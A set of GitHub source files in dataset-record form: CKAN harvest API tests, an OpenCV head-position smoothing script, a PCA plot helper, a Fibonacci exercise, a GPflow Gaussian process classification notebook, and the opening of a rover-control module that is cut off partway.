self.app.post('/api/action/package_search', params=postparams)\n res = json.loads(res.body)\n result = res['result']\n\n # Only one dataset returned\n assert_equal(res['success'], True)\n assert_equal(result['count'], 1)\n assert_equal(result['results'][0]['name'], 'test-spatial-dataset-search-point-2')\n\n\nclass TestHarvestedMetadataAPI(WsgiAppCase):\n\n\n @classmethod\n def setup_class(cls):\n try:\n from ckanext.harvest.model import HarvestObject, HarvestJob, HarvestSource, HarvestObjectExtra\n except ImportError:\n raise SkipTest('The harvester extension is needed for these tests')\n\n cls.content1 = 'Content 1'\n ho1 = HarvestObject(guid='test-ho-1',\n job=HarvestJob(source=HarvestSource(url='http://', type='xx')),\n content=cls.content1)\n\n cls.content2 = 'Content 2'\n cls.original_content2 = 'Original Content 2'\n ho2 = HarvestObject(guid='test-ho-2',\n job=HarvestJob(source=HarvestSource(url='http://', type='xx')),\n content=cls.content2)\n\n hoe = HarvestObjectExtra(key='original_document',\n value=cls.original_content2,\n object=ho2)\n\n Session.add(ho1)\n Session.add(ho2)\n Session.add(hoe)\n Session.commit()\n\n cls.object_id_1 = ho1.id\n cls.object_id_2 = ho2.id\n\n\n def test_api(self):\n\n # Test redirects for old URLs\n url = '/api/2/rest/harvestobject/{0}/xml'.format(self.object_id_1)\n r = self.app.get(url)\n assert r.status == 301\n assert '/harvest/object/{0}'.format(self.object_id_1) in r.header_dict['Location']\n\n url = '/api/2/rest/harvestobject/{0}/html'.format(self.object_id_1)\n r = self.app.get(url)\n assert r.status == 301\n assert '/harvest/object/{0}/html'.format(self.object_id_1) in r.header_dict['Location']\n\n\n # Access object content\n url = '/harvest/object/{0}'.format(self.object_id_1)\n r = self.app.get(url)\n assert r.status == 200\n assert r.header_dict['Content-Type'] == 'application/xml; charset=utf-8'\n assert r.body == self.content1\n\n # Access original content in object extra (if present)\n url = '/harvest/object/{0}/original'.format(self.object_id_1)\n r = self.app.get(url, status=404)\n assert r.status == 404\n\n url = '/harvest/object/{0}/original'.format(self.object_id_2)\n r = self.app.get(url)\n assert r.status == 200\n assert r.header_dict['Content-Type'] == 'application/xml; charset=utf-8'\n assert r.body == self.original_content2\n\n # Access HTML transformation\n url = '/harvest/object/{0}/html'.format(self.object_id_1)\n r = self.app.get(url)\n assert r.status == 200\n assert r.header_dict['Content-Type'] == 'text/html; charset=utf-8'\n assert 'GEMINI record about' in r.body\n\n url = '/harvest/object/{0}/html/original'.format(self.object_id_1)\n r = self.app.get(url, status=404)\n assert r.status == 404\n\n url = '/harvest/object/{0}/html'.format(self.object_id_2)\n r = self.app.get(url)\n assert r.status == 200\n assert r.header_dict['Content-Type'] == 'text/html; charset=utf-8'\n assert 'GEMINI record about' in r.body\n\n url = '/harvest/object/{0}/html/original'.format(self.object_id_2)\n r = self.app.get(url)\n assert r.status == 200\n assert r.header_dict['Content-Type'] == 'text/html; charset=utf-8'\n assert 'GEMINI record about' in r.body\n","repo_name":"IFPRI/sda-ckan-ar","sub_path":"ckanext-spatial/ckanext/spatial/tests/test_api.py","file_name":"test_api.py","file_ext":"py","file_size_in_byte":7838,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"802634443","text":"#Imports necesarios\r\nfrom collections import namedtuple\r\nimport time\r\n#Herramientas de vision por computador\r\nimport cv2\r\n\r\nimport tfg_utils as utils\r\n\r\n#Constantes que definen como ha terminado el programa\r\nERROR_VIDEO_FILE = 0\r\nSUCCESS = 1\r\n\r\n#Constante para aproximar la altura de la cabeza\r\nHUMAN_HEAD_RATIO = 7\r\n\r\n#Tuplas\r\nVector2D = namedtuple(\"Vector2D\", \"x y\")\r\nRectangle = namedtuple(\"Rectangle\", \"x y w h\")\r\n\r\n#Ejecuta el programa principal\r\ndef main():\r\n return\r\n\r\ndef execute(input_file, output_file, video_file = None):\r\n input_file = open(input_file, \"r\")\r\n text_lines = input_file.read().splitlines()\r\n\r\n video_width, video_height, video_fps = parse_video_dimensions(text_lines[0])\r\n\r\n rectangles = parse_rectangles(text_lines)\r\n\r\n head_positions = get_head_centers(rectangles)\r\n smooth_positions = smooth_damp_head_positions(head_positions, video_fps)\r\n\r\n output = open(output_file, \"w\")\r\n\r\n for position in smooth_positions:\r\n output.write(f'{position.x} {position.y}\\n')\r\n\r\n output.close()\r\n\r\n if not video_file is None:\r\n show_result_in_video(video_file, head_positions, smooth_positions, video_fps)\r\n \r\n return SUCCESS\r\n\r\ndef parse_video_dimensions(string):\r\n split = string.split(\" \")\r\n return float(split[0]), float(split[1]), float(split[2])\r\n\r\ndef parse_rectangles(text_lines):\r\n rectangles = []\r\n for i in range(1, len(text_lines)):\r\n rectangles.append(parse_rectangle(text_lines[i]))\r\n return rectangles\r\n\r\ndef parse_rectangle(string):\r\n split = string.split(\" \")\r\n rect = Rectangle(float(split[1]), float(split[2]), float(split[3]), float(split[4]))\r\n return rect\r\n\r\n#Estima el centro de la cabeza de la persona\r\ndef aproximate_head_center(rect):\r\n return Vector2D(rect.x + rect.w * 0.5, rect.y + rect.y / HUMAN_HEAD_RATIO)\r\n\r\n#Devuelve una lista de posiciones aproximadas de la cabeza\r\ndef get_head_centers(rectangles):\r\n head_positions = []\r\n for rect in rectangles:\r\n head_center = aproximate_head_center(rect)\r\n head_positions.append(head_center)\r\n return head_positions\r\n\r\ndef smooth_damp_head_positions(head_positions, video_fps):\r\n\r\n smooths = []\r\n smooth_vector = Vector2D(head_positions[0].x, head_positions[0].y)\r\n\r\n velocity_x = 0\r\n velocity_y = 0\r\n\r\n smooth_time = 0.50 # 0.085\r\n delta_time = 1 / video_fps\r\n\r\n for position in head_positions:\r\n smooth_x, velocity_x = smooth_damp(smooth_vector.x, position.x, velocity_x, smooth_time, delta_time)\r\n smooth_y, velocity_y = smooth_damp(smooth_vector.y, position.y, velocity_y, smooth_time, delta_time)\r\n\r\n smooth_vector = Vector2D(smooth_x, smooth_y)\r\n smooths.append(Vector2D(smooth_x, smooth_y))\r\n return smooths\r\n\r\ndef smooth_damp(current, target, currentVelocity, smoothTime, deltaTime):\r\n smoothTime = Max(0.0001, smoothTime)\r\n num1 = 2 / smoothTime\r\n num2 = num1 * deltaTime\r\n num3 = (1.0 / (1.0 + num2 + 0.479999989271164 * num2 * num2 + 0.234999999403954 * num2 * num2 * num2))\r\n num4 = current - target\r\n num5 = target\r\n \r\n target = current - num4\r\n num7 = (currentVelocity + num1 * num4) * deltaTime\r\n currentVelocity = (currentVelocity - num1 * num7) * num3\r\n num8 = target + (num4 + num7) * num3\r\n\r\n if (num5 - current > 0.0 == num8 > num5):\r\n num8 = num5\r\n currentVelocity = (num8 - num5) / deltaTime\r\n\r\n return num8, currentVelocity\r\n\r\ndef Max(a, b):\r\n if (a > b):\r\n return a\r\n return b\r\n\r\n#Devuelve un caputurador de video para sacar los fotogramas del video\r\ndef initialize_video(video_file):\r\n capture = cv2.VideoCapture(video_file)\r\n #En caso de que el capturador no haya podido abrir el video devolvemos None\r\n if(not capture.isOpened()): return None\r\n return capture\r\n\r\ndef show_result_in_video(video_file, head_positions, smooth_positions, video_fps):\r\n video_capure = initialize_video(video_file)\r\n if not video_capure is None:\r\n frame_index = 0\r\n while video_capure.isOpened():\r\n #Leemos el siguiente fotograma del video\r\n success, frame = video_capure.read()\r\n #En caso de que algo falle o no queden fotogramas paramos\r\n if frame is None or not success:\r\n break\r\n\r\n original_color = (0, 0, 255)\r\n smooth_color = (0, 255, 0)\r\n\r\n ox, oy = int(head_positions[frame_index].x), int(head_positions[frame_index].y)\r\n sx, sy = int(smooth_positions[frame_index].x), int(smooth_positions[frame_index].y)\r\n\r\n frame = cv2.rectangle(frame, (ox, oy),(ox + 2, oy + 2), original_color, 20)\r\n frame = cv2.rectangle(frame, (sx, sy),(sx + 2, sy + 2), smooth_color, 20)\r\n \r\n frame = cv2.resize(frame, (960, 540))\r\n cv2.imshow(\"Previsualizacion\", frame)\r\n if cv2.waitKey(1) & 0xFF == ord('q'):\r\n break\r\n\r\n frame_index += 1\r\n time.sleep(1 / (video_fps * 3))\r\n\r\n if frame_index >= len(head_positions):\r\n break\r\n \r\n # Release the video file\r\n video_capure.release()\r\n # Close the window where the image is shown\r\n cv2.destroyAllWindows()\r\n\r\n#Si ejecutamos este script como principal invocamos el metodo Main\r\nif __name__ == '__main__': main()","repo_name":"jorequis/TFG","sub_path":"TFG_GPU/p2cropsmooth/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5343,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"14480493669","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom mpl_toolkits.mplot3d import Axes3D\nfrom sklearn import decomposition\n\ndef plot3DView(features,prediction):\n fig = plt.figure(1, figsize=(4, 3))\n plt.clf()\n ax = Axes3D(fig, rect=[0, 0, .95, 1], elev=48, azim=134)\n plt.cla()\n\n pca=decomposition.PCA(n_components=3)\n pca.fit(features)\n reducedFeatures=pca.transform(features)\n\n for name, label in [('Normal', 1), ('Anomalous',-1)]:\n ax.text3D(features[prediction == label, 0].mean(),\n features[prediction == label, 1].mean() + 1.5,\n features[prediction == label, 2].mean(), name,\n horizontalalignment='center',\n bbox=dict(alpha=.5, edgecolor='w', facecolor='w'))\n # Reorder the labels to have colors matching the cluster results\n #cy = np.choose(y, [1, -1]).astype(np.float)\n ax.scatter(features[:, 0], features[:, 1], features[:, 2], c=prediction, cmap=plt.cm.spectral)\n ax.w_xaxis.set_ticklabels([])\n ax.w_yaxis.set_ticklabels([])\n ax.w_zaxis.set_ticklabels([])\n plt.show()\n return\n","repo_name":"KrMantavya/Anomaly-Detection-In-Videos","sub_path":"Scripts/drawFigure.py","file_name":"drawFigure.py","file_ext":"py","file_size_in_byte":1095,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"21"} +{"seq_id":"21295490397","text":"\"\"\"\r\nFibonacci\r\n\r\n\r\nThe Fibonacci sequence is one of the most famous formulas in mathematics.\r\nEach number in the sequence is the sum of the two numbers that precede it.\r\nFor example, here is the Fibonacci sequence for 10 numbers, starting from 0: 0,1,1,2,3,5,8,13,21,34.\r\n\r\nWrite a program to take N (variable num in code template) positive numbers as input, and recursively calculate and output the first N numbers of the Fibonacci sequence (starting from 0).\r\n\"\"\"\r\nnum = int(input())\r\n\r\n\r\ndef fibonacci(n):\r\n #complete the recursive function\r\n\tfrom functools import reduce\r\n\r\n\tfib = lambda n: reduce(lambda x, _: x+[x[-1]+x[-2]],\r\n\t\t\t\t\t\t\t\trange(n-2), [0, 1])\r\n\r\n\tx = fib(n)\r\n\tfor i in x:\r\n\t\tprint(i)\r\n\t\t\r\n\r\nfibonacci(num)\r\n","repo_name":"Virgo-Alpha/AlphaPython","sub_path":"fib.py","file_name":"fib.py","file_ext":"py","file_size_in_byte":729,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20059569806","text":"# ---\n# jupyter:\n# jupytext:\n# formats: ipynb,.pct.py:percent\n# text_representation:\n# extension: .py\n# format_name: percent\n# format_version: '1.3'\n# jupytext_version: 1.3.3\n# kernelspec:\n# display_name: Python 3\n# language: python\n# name: python3\n# ---\n\n# %% [markdown]\n# # Basic (binary) GP classification model\n#\n#\n# This notebook shows how to build a GP classification model using variational inference.\n# Here we consider binary (two-class, 0 vs. 1) classification only (there is a separate notebook on [multiclass classification](../advanced/multiclass_classification.ipynb)).\n# We first look at a one-dimensional example, and then show how you can adapt this when the input space is two-dimensional.\n\n# %%\nimport numpy as np\nimport gpflow\nimport tensorflow as tf\n\nimport matplotlib.pyplot as plt\n\n# %matplotlib inline\n\nplt.rcParams[\"figure.figsize\"] = (8, 4)\n\n# %% [markdown]\n# ## One-dimensional example\n#\n# First of all, let's have a look at the data. `X` and `Y` denote the input and output values.\n# **NOTE:** `X` and `Y` must be two-dimensional NumPy arrays, $N \\times 1$ or $N \\times D$, where $D$ is the number of input dimensions/features, with the same number of rows as $N$ (one for each data point):\n\n# %%\nX = np.genfromtxt(\"data/classif_1D_X.csv\").reshape(-1, 1)\nY = np.genfromtxt(\"data/classif_1D_Y.csv\").reshape(-1, 1)\n\nplt.figure(figsize=(10, 6))\n_ = plt.plot(X, Y, \"C3x\", ms=8, mew=2)\n\n# %% [markdown]\n# ### Reminders on GP classification\n#\n# For a binary classification model using GPs, we can simply use a `Bernoulli` likelihood. The details of the generative model are as follows:\n#\n# __1. Define the latent GP:__ we start from a Gaussian process $f \\sim \\mathcal{GP}(0, k(\\cdot, \\cdot'))$:\n\n# %%\n# build the kernel and covariance matrix\nk = gpflow.kernels.Matern52(variance=20.0)\nx_grid = np.linspace(0, 6, 200).reshape(-1, 1)\nK = k(x_grid)\n\n# sample from a multivariate normal\nrng = np.random.RandomState(6)\n\nL = np.linalg.cholesky(K)\nf_grid = np.dot(L, rng.randn(200, 5))\nplt.plot(x_grid, f_grid, \"C0\", linewidth=1)\n_ = plt.plot(x_grid, f_grid[:, 1], \"C0\", linewidth=2)\n\n# %% [markdown]\n# __2. Squash them to $[0, 1]$:__ the samples of the GP are mapped to $[0, 1]$.\n# By default, GPflow uses the standard normal cumulative distribution function (inverse probit function): $p(x) = \\Phi(f(x)) = \\frac{1}{2} (1 + \\operatorname{erf}(x / \\sqrt{2}))$.\n# (This choice has the advantage that predictive mean, variance and density can be computed analytically, but any choice of invlink is possible, e.g. the logit $p(x) = \\frac{\\exp(f(x))}{1 + \\exp(f(x))}$. Simply pass another function as the `invlink` argument to the `Bernoulli` likelihood class.)\n\n# %%\ndef invlink(f):\n return gpflow.likelihoods.Bernoulli().invlink(f).numpy()\n\n\np_grid = invlink(f_grid)\nplt.plot(x_grid, p_grid, \"C1\", linewidth=1)\n_ = plt.plot(x_grid, p_grid[:, 1], \"C1\", linewidth=2)\n\n# %% [markdown]\n# __3. Sample from a Bernoulli:__ for each observation point $X_i$, the class label $Y_i \\in \\{0, 1\\}$ is generated by sampling from a Bernoulli distribution $Y_i \\sim \\mathcal{B}(g(X_i))$.\n\n# %%\n# Select some input locations\nind = rng.randint(0, 200, (30,))\nX_gen = x_grid[ind]\n\n# evaluate probability and get Bernoulli draws\np = p_grid[ind, 1:2]\nY_gen = rng.binomial(1, p)\n\n# plot\nplt.plot(x_grid, p_grid[:, 1], \"C1\", linewidth=2)\nplt.plot(X_gen, p, \"C1o\", ms=6)\n_ = plt.plot(X_gen, Y_gen, \"C3x\", ms=8, mew=2)\n\n# %% [markdown]\n# ### Implementation with GPflow\n#\n# For the model described above, the posterior $f(x)|Y$ (say $p$) is not Gaussian any more and does not have a closed-form expression.\n# A common approach is then to look for the best approximation of this posterior by a tractable distribution (say $q$) such as a Gaussian distribution.\n# In variational inference, the quality of an approximation is measured by the Kullback-Leibler divergence $\\mathrm{KL}[q \\| p]$.\n# For more details on this model, see Nickisch and Rasmussen (2008).\n#\n# The inference problem is thus turned into an optimization problem: finding the best parameters for $q$.\n# In our case, we introduce $U \\sim \\mathcal{N}(q_\\mu, q_\\Sigma)$, and we choose $q$ to have the same distribution as $f | f(X) = U$.\n# The parameters $q_\\mu$ and $q_\\Sigma$ can be seen as parameters of $q$, which can be optimized in order to minimise $\\mathrm{KL}[q \\| p]$.\n#\n# This variational inference model is called `VGP` in GPflow:\n\n# %%\nm = gpflow.models.VGP(\n (X, Y), likelihood=gpflow.likelihoods.Bernoulli(), kernel=gpflow.kernels.Matern52()\n)\n\nopt = gpflow.optimizers.Scipy()\nopt.minimize(m.training_loss, variables=m.trainable_variables)\n\n# %% [markdown]\n# We can now inspect the result of the optimization with `gpflow.utilities.print_summary(m)`:\n\n# %%\ngpflow.utilities.print_summary(m, fmt=\"notebook\")\n\n# %% [markdown]\n# In this table, the first two lines are associated with the kernel parameters, and the last two correspond to the variational parameters.\n# **NOTE:** In practice, $q_\\Sigma$ is actually parameterized by its lower-triangular square root $q_\\Sigma = q_\\text{sqrt} q_\\text{sqrt}^T$ in order to ensure its positive-definiteness.\n#\n# For more details on how to handle models in GPflow (getting and setting parameters, fixing some of them during optimization, using priors, and so on), see [Manipulating GPflow models](../understanding/models.ipynb).\n\n# %% [markdown]\n# ### Predictions\n#\n# Finally, we will see how to use model predictions to plot the resulting model.\n# We will replicate the figures of the generative model above, but using the approximate posterior distribution given by the model.\n\n# %%\nplt.figure(figsize=(12, 8))\n\n# bubble fill the predictions\nmu, var = m.predict_f(x_grid)\n\nplt.fill_between(\n x_grid.flatten(),\n np.ravel(mu + 2 * np.sqrt(var)),\n np.ravel(mu - 2 * np.sqrt(var)),\n alpha=0.3,\n color=\"C0\",\n)\n\n# plot samples\ntf.random.set_seed(6)\nsamples = m.predict_f_samples(x_grid, 10).numpy().squeeze().T\n\nplt.plot(x_grid, samples, \"C0\", lw=1)\n\n# plot p-samples\np = invlink(samples)\nplt.plot(x_grid, p, \"C1\", lw=1)\n\n# plot data\nplt.plot(X, Y, \"C3x\", ms=8, mew=2)\nplt.ylim((-3, 3))\n\n# %% [markdown]\n# ## Two-dimensional example\n#\n# In this section we will use the following data:\n\n# %%\nX = np.loadtxt(\"data/banana_X_train\", delimiter=\",\")\nY = np.loadtxt(\"data/banana_Y_train\", delimiter=\",\").reshape(-1, 1)\nmask = Y[:, 0] == 1\n\nplt.figure(figsize=(6, 6))\nplt.plot(X[mask, 0], X[mask, 1], \"oC0\", mew=0, alpha=0.5)\n_ = plt.plot(X[np.logical_not(mask), 0], X[np.logical_not(mask), 1], \"oC1\", mew=0, alpha=0.5)\n\n# %% [markdown]\n# The model definition is the same as above; the only important difference is that we now specify that the kernel operates over a two-dimensional input space:\n\n# %%\nm = gpflow.models.VGP(\n (X, Y), kernel=gpflow.kernels.SquaredExponential(), likelihood=gpflow.likelihoods.Bernoulli()\n)\n\nopt = gpflow.optimizers.Scipy()\nopt.minimize(\n m.training_loss, variables=m.trainable_variables, options=dict(maxiter=25), method=\"L-BFGS-B\"\n)\n# in practice, the optimization needs around 250 iterations to converge\n\n# %% [markdown]\n# We can now plot the predicted decision boundary between the two classes.\n# To do so, we can equivalently plot the contour lines $E[f(x)|Y]=0$, or $E[g(f(x))|Y]=0.5$.\n# We will do the latter, because it allows us to introduce the `predict_y` function, which returns the mean and variance at test points:\n\n# %%\nx_grid = np.linspace(-3, 3, 40)\nxx, yy = np.meshgrid(x_grid, x_grid)\nXplot = np.vstack((xx.flatten(), yy.flatten())).T\n\np, _ = m.predict_y(Xplot) # here we only care about the mean\nplt.figure(figsize=(7, 7))\nplt.plot(X[mask, 0], X[mask, 1], \"oC0\", mew=0, alpha=0.5)\nplt.plot(X[np.logical_not(mask), 0], X[np.logical_not(mask), 1], \"oC1\", mew=0, alpha=0.5)\n\n_ = plt.contour(\n xx,\n yy,\n p.numpy().reshape(*xx.shape),\n [0.5], # plot the p=0.5 contour line only\n colors=\"k\",\n linewidths=1.8,\n zorder=100,\n)\n\n# %% [markdown]\n# ## Further reading\n#\n# There are dedicated notebooks giving more details on how to manipulate [models](../understanding/models.ipynb) and [kernels](../advanced/kernels.ipynb).\n#\n# This notebook covers only very basic classification models. You might also be interested in:\n# * [Multiclass classification](../advanced/multiclass_classification.ipynb) if you have more than two classes.\n# * [Sparse models](../advanced/gps_for_big_data.ipynb). The models above have one inducing variable $U_i$ per observation point $X_i$, which does not scale to large datasets. Sparse Variational GP (SVGP) is an efficient alternative where the variables $U_i$ are defined at some inducing input locations $Z_i$ that can also be optimized.\n# * [Exact inference](../advanced/mcmc.ipynb). We have seen that variational inference provides an approximation to the posterior. GPflow also supports exact inference using Markov Chain Monte Carlo (MCMC) methods, and the kernel parameters can also be assigned prior distributions in order to avoid point estimates.\n#\n# ## References\n#\n# Hannes Nickisch and Carl Edward Rasmussen. 'Approximations for binary Gaussian process classification'. *Journal of Machine Learning Research* 9(Oct):2035--2078, 2008.\n","repo_name":"david-gomez-guillen/phd","sub_path":"resources/libraries/GPflow/doc/source/notebooks/basics/classification.pct.py","file_name":"classification.pct.py","file_ext":"py","file_size_in_byte":9219,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"12414030199","text":"#!/usr/bin/python -OO\n\n\n'''.\nFuctionality for my squid 8wd rover\n\n@organization: Steelsquid\n@author: Andreas Nilsson\n@contact: steelsquid@gmail.com\n@license: GNU Lesser General Public License v2.1\n@change: 2016-03-13 Created\n'''\n\n\nimport steelsquid_utils\nimport steelsquid_pi\nimport steelsquid_kiss_global\nimport steelsquid_nm\nimport steelsquid_kiss_boot\nimport time\nimport datetime\nimport steelsquid_hmtrlrs\nfrom decimal import Decimal\nfrom espeak import espeak\nespeak.set_voice(\"sv+f5\")\n\n# Is this module started\n# This is set by the system automatically.\nis_started = False\n\n\ndef enable(argument=None):\n '''\n When this module is enabled what needs to be done (execute: steelsquid module XXX on)\n Maybe you need create some files or enable other stuff.\n argument: Send data to the enable or disable method in the module\n Usually a string to tell the start/stop something\n '''\n # Clear any saved settings for this module\n steelsquid_kiss_global.clear_modules_settings(\"kiss_squidrover\")\n # Enable transeiver as client\n steelsquid_kiss_global.hmtrlrs_status(\"server\")\n # Disable the automatic print if IP to LCD...this module will do it\n steelsquid_utils.set_flag(\"no_net_to_lcd\")\n # Change GPIO for transceiver\n #steelsquid_utils.set_parameter(\"hmtrlrs_config_gpio\", str(STATIC.hmtrlrs_config_gpio))\n #steelsquid_utils.set_parameter(\"hmtrlrs_reset_gpio\", str(STATIC.hmtrlrs_reset_gpio))\n\n\ndef disable(argument=None):\n '''\n When this module is disabled what needs to be done (execute: steelsquid module XXX off)\n Maybe you need remove some files or disable other stuff.\n argument: Send data to the enable or disable method in the module\n Usually a string to tell the start/stop something\n '''\n # Enable the automatic print if IP to LCD\n steelsquid_utils.del_flag(\"no_net_to_lcd\")\n # Remove the voltage warning and power off (lipo 4s)\n steelsquid_utils.del_parameter(\"voltage_warning\")\n # Disable the HM-TRLR-S\n steelsquid_kiss_global.hmtrlrs_status(None)\n\n\n\n\n\n\nclass STATIC(object):\n '''\n Put static variables here (Variables that never change).\n It is not necessary to put it her, but i think it is kind of nice to have it inside this class.\n '''\n \n # voltage warning (lipo 7s)\n voltage_warning = 24.5\n \n # Max motor speed\n motor_max = 1000\n \n # Max slow speed\n # When the battery is mor than 24 volt (when i use 2 * 14.8V)\n motor_slow_max = 800\n\n # When system start move servo here\n servo_position_pan_start = 370\n\n # Max Servo position\n servo_position_pan_max = 590\n\n # Min Servo position\n servo_position_pan_min = 180\n\n # When system start move servo here\n servo_position_tilt_start = 400\n\n # Max Servo position\n servo_position_tilt_max = 530\n\n # Min Servo position\n servo_position_tilt_min = 280\n\n\n\n\n\n\nclass DYNAMIC(object):\n '''\n Put dynamic variables here.\n If you have variables holding some data that you use and change in this module, you can put them here.\n Maybe toy enable something in the WEB class and want to use it from the LOOP class.\n Instead of adding it to either WEB or LOOP you can add it here.\n It is not necessary to put it her, but i think it is kind of nice to have it inside this class.\n '''\n \n # Last LCD message to print\n last_lcd_message = None\n \n # Using this when i print a message to LCD, so the next ip/voltage uppdat dont ovrewrite the message to fast\n stop_next_lcd_message = False\n\n # Using this to know when to turn on and off the cruise control\n cruise_enabled = False\n\n # Current max speed of the motors\n # Can eider be STATIC.motor_max or STATIC.motor_slow_max\n current_max = STATIC.motor_max\n\n\n\n\n\nclass SETTINGS(object):\n '''\n The system will try to load settings with the same name as all variables in the class SETTINGS.\n If the variable value is Boolean: steelsquid_utils.get_flag(\"variable_name\")\n If the variable value is Integer, Float, String: steelsquid_utils.get_parameter(\"variable_name\")\n If the variable value is Array []: steelsquid_utils.get_list(\"variable_name\")\n The variable value will also be used as default value if the paramater or list not is found\n When the system shutdowen the value of the variable will also be saved to disk\n EX: this_is_a_flag = False\n this_is_a_parameter = \"a_default_value\"\n this_is_a_list = []\n System try to read: steelsquid_utils.get_flag(\"this_is_a_flag\")\n System try to read: steelsquid_utils.get_parameter(\"this_is_a_parameter\", \"a_default_value\")\n System try to read: steelsquid_utils.get_list(\"this_is_a_list\", [])\n If you want to disable save and read the settings from disk add a variable like this.\n This is usefull under development if you wan to test different values when you restart the module,\n otherwise the value from the first execution to be used ...\n _persistent_off = True\n To sum up: Variables in class SETTINGS that has value: Boolean, Array, Integer, Float, String will be will be persistent.\n '''\n \n # This will tell the system not to save and read the settings from disk\n _persistent_off = False\n \n \n\n\n\n\nclass SYSTEM(object):\n '''\n Methods in this class will be executed by the system if module is enabled\n on_start() exist it will be executed when system starts (boot)\n on_stop() exist it will be executed when system stops (shutdown)\n on_network(status, wired, wifi_ssid, wifi, wan) exist it will be execute on network up or down\n on_vpn(status, name, ip) This will fire when a VPN connection is enabled/disabled.\n on_bluetooth(status) exist it will be execute on bluetooth enabled\n on_mount(type_of_mount, remote, local) This will fire when USB, Samba(windows share) or SSH is mounted.\n on_umount(type_of_mount, remote, local) This will fire when USB, Samba(windows share) or SSH is unmounted.\n on_event_data(key, value) exist it will execute when data is changed with steelsquid_kiss_global.set_event_data(key, value)\n '''\n\n @staticmethod\n def on_start():\n '''\n This will execute when system starts\n Do not execute long running stuff here, do it in on_loop...\n '''\n # Startup message\n steelsquid_utils.shout(\"Steelsquid SquidRover started\")\n # Enable network by default\n try:\n steelsquid_nm.set_network_status(True) \n except:\n pass\n GLOBAL.camera(STATIC.servo_position_pan_start, STATIC.servo_position_tilt_start)\n \n \n @staticmethod\n def on_stop():\n '''\n This will execute when system stops\n Do not execute long running stuff here\n '''\n GLOBAL.drive(0, 0)\n steelsquid_pi.cleanup() \n \n \n \n\n\n\nclass LOOP(object):\n '''\n Every static method with no inparameters will execute over and over again untill it return None or -1\n If it return a number larger than 0 it will sleep for that number of seconds before execute again.\n If it return 0 it will not not sleep, will execute again immediately.\n Every method will execute in its own thread\n '''\n \n last_value = None\n \n @staticmethod\n def update_lcd_and_voltage():\n '''\n Execute every 2 second\n ''' \n try:\n # Print IP/voltage to LCD\n if not DYNAMIC.stop_next_lcd_message:\n print_this = []\n print_this.append(steelsquid_utils.get_date_time())\n connected = False\n # Get network status\n if steelsquid_kiss_global.last_net:\n if steelsquid_kiss_global.last_wifi_name!=\"---\":\n print_this.append(steelsquid_kiss_global.last_wifi_name)\n print_this.append(steelsquid_kiss_global.last_wifi_ip)\n connected=True\n if steelsquid_kiss_global.last_lan_ip!=\"---\":\n print_this.append(steelsquid_kiss_global.last_lan_ip)\n connected=True\n # Write text to LCD\n if len(print_this)>0:\n new_lcd_message = \"\\n\".join(print_this)\n if new_lcd_message!=DYNAMIC.last_lcd_message:\n DYNAMIC.last_lcd_message = new_lcd_message\n steelsquid_pi.ssd1306_write(new_lcd_message, 0)\n else:\n DYNAMIC.stop_next_lcd_message=False\n # Read rover voltage\n RADIO_SYNC.SERVER.voltage_rover = GLOBAL.voltage()\n except:\n if steelsquid_kiss_boot.running:\n steelsquid_utils.shout()\n return 2 # Execute this method again in 2 second\n \n \n \n #@staticmethod\n #def camera_stabilisation():\n # '''\n # Stabilitate the camera around the x rotation\n # ''' \n # try:\n # x, y = steelsquid_pi.mpu6050_rotation(samples=11)\n # x = int(x)\n # print x\n # RADIO_PUSH_2.camera_tilt = STATIC.servo_position_tilt_start+(x*3)\n # GLOBAL.camera(None, RADIO_PUSH_2.camera_tilt)\n # except:\n # pass\n # return 0.001\n\n\n\n\nclass RADIO(object):\n '''\n If you have a NRF24L01+ or HM-TRLR-S transceiver connected to this device you can use server/client or master/slave functionality.\n HM-TRLR-S\n Enable the HM-TRLR-S server functionality in command line: set-flag hmtrlrs_server\n On client device: set-flag hmtrlrs_client\n Must restart the steelsquid daeomon for it to take effect.\n In python you can do: steelsquid_kiss_global.hmtrlrs_status(status)\n status: server=Enable as server\n client=Enable as client\n None=Disable\n SERVER/CLIENT:\n If the clent execute: data = steelsquid_hmtrlrs.request(\"a_command\", data)\n A method with the name a_command(data) will execute on the server in class RADIO.\n The server then can return some data that the client will reseive...\n You can also execute: steelsquid_hmtrlrs.broadcast(\"a_command\", data)\n If you do not want a response back from the server. \n The method on the server should then return None.\n If server method raise exception the steelsquid_hmtrlrs.request(\"a_command\", data) will also raise a exception.\n '''\n \n\n @staticmethod\n def horn(parameters):\n '''\n Horn\n A request from client to sound the horn\n '''\n GLOBAL.horn()\n return []\n\n\n @staticmethod\n def left(parameters):\n '''\n Center\n A request from client to left the camera\n '''\n GLOBAL.camera(STATIC.servo_position_pan_max, STATIC.servo_position_tilt_start)\n return []\n\n\n @staticmethod\n def center(parameters):\n '''\n Center\n A request from client to center the camera\n '''\n GLOBAL.camera(STATIC.servo_position_pan_start, STATIC.servo_position_tilt_start)\n return []\n\n\n @staticmethod\n def right(parameters):\n '''\n Center\n A request from client to right the camera\n '''\n GLOBAL.camera(STATIC.servo_position_pan_min, STATIC.servo_position_tilt_start)\n return []\n\n\n @staticmethod\n def text_to_speach(parameters):\n '''\n Say something\n '''\n espeak.synth(parameters[0])\n return []\n\n\n\n\n\nclass RADIO_SYNC(object):\n '''\n Class RADIO_SYNC\n If you use a HM-TRLR-S and it is enabled (set-flag hmtrlrs_server) this class will make the client send\n ping commadns to the server.\n staticmethod: on_sync(seconds_since_last_ok_ping)\n seconds_since_last_ok_ping: Seconds since last sync that went OK (send or reseive)\n Will fire after every sync on the client (ones a second or when steelsquid_kiss_global.radio_interrupt() is executed)\n This will also be executed on server (When sync is reseived or about every seconds when no activity from the client).\n Class CLIENT (Inside RADIO_SYNC)\n All varibales in this class will be synced from the client to the server\n OBS! The variables most be in the same order in the server and client\n The variables can only be int, float, bool or string\n If you have the class RADIO_SYNC this inner class must exist or the system want start\n Class SERVER (Inside RADIO_SYNC)\n All varibales in this class will be synced from the server to the client\n OBS! The variables most be in the same order in the server and client\n The variables can only be int, float, bool or 